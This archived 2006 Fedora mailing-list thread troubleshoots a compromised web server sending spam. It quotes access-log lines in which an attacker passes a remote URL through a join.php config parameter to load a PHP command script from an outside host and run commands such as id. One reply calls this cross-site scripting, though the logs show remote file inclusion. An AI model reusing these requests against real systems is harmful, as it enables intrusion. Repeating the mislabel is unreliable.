Re: Postfix hit again (Spam)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue, 23 May 2006 16:39:20 +0100 Paul Howarth <paul@xxxxxxxxxxxx> wrote:

On Tue, 2006-05-23 at 11:25 -0400, CodeHeads wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue, 23 May 2006 08:45:30 +0100 Paul Howarth <paul@xxxxxxxxxxxx> wrote:

On Mon, 2006-05-22 at 23:11 -0400, CodeHeads wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue, 23 May 2006 00:14:32 +0000
replies-lists-redhat@xxxxxxxxxxxxxxxxxxxxx wrote:
i haven't been following this topic in great detail, but i suspect
that you have a form on your site that is being exploited for "form
spam". if you're not familiar with this, search google for "form
spam".

- Rick


Rick,
Thank you, No, I have not heard of this.

I don't think that's what this is. Form spam takes advantage of
poorly-coded mail/contact forms and uses them to send mail to recipients
other than those intended by the form designer.

What's happening here is that the spammer is running their own code
(downloaded into /tmp) to send the mail, a rather more serious
situation.

Paul.

I might not know too much but I really think they are using my forms. I
found quite a few log entries. Here are a few.
81.199.173.8 - - [22/May/2006:18:57:51 -0400]
"POST /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://www.tiffefermaintfashion.com/gbook/tmp/xzblog.txt?
HTTP/1.0" 200 5923

AOL:
172.179.33.217 - - [21/May/2006:07:58:01 -0400]
"GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=id
HTTP/1.1" 200 2374
172.179.33.217 - - [21/May/2006:07:58:20 -0400]
"GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=w
HTTP/1.1" 200 2412
172.179.33.217 - - [21/May/2006:07:58:34 -0400]
"GET /topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=cd%20/var/tmp
HTTP/1.1" 200 2323

And the xpl.netmisphere2.com site has hacking information:
http://xpl.netmisphere2.com/ I think this outta be illegal!!

Looks like an exploit of a cross-site scripting vulnerability in your
join.php form. http://xpl.netmisphere2.com/CMD.gif is the cracker's PHP
script that gets injected into your form, it's not an image at all.

You need to turn off that form until you can get a fixed version of that
application. And of course reinstall that system.

Paul.


Thanks Paul, That is what I thought. I am writing my own topsites anyway, so
that is no big deal. I will be deleting the other one.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEczXHfw3TK8jhZrsRAnILAKCH0SHKRpaagUi3Fe4oJSiUWDvC5wCaAuCQ
5sR75hAfYXAmF2Cjh5suKfo=
=4buC
-----END PGP SIGNATURE-----

--
fedora-list mailing list
fedora-list@xxxxxxxxxx
To unsubscribe: https://www.redhat.com/mailman/listinfo/fedora-list

Relevant Pages

  • Re: Spamassassin+evolution: size?
    ... Hash: SHA1 ... It's somewhere in the documentation, ... > really large messages usually aren't spam anyway so you wouldn't gain ...
    (Debian-User)
  • Re: Postfix hit again (Spam)
    ... Hash: SHA1 ... you have a form on your site that is being exploited for "form spam". ... Looks like an exploit of a cross-site scripting vulnerability in your ...
    (Fedora)
  • Re: Postfix hit again (Spam)
    ... Hash: SHA1 ... you have a form on your site that is being exploited for "form spam". ... if you're not familiar with this, search google for "form spam". ...
    (Fedora)
  • Re: Man gets nine years for spamming
    ... Hash: SHA1 ... Clearly SPAM is more dangerous that destroying someones life. ...
    (alt.computer.security)
  • Re: Chinas plan for Tibetan cultural genocide..
    ... Hash: SHA1 ... animals (the nomads got to keep the money from said sale) and move ... What can be sure is that the U.S. government did not promise ...
    (soc.culture.china)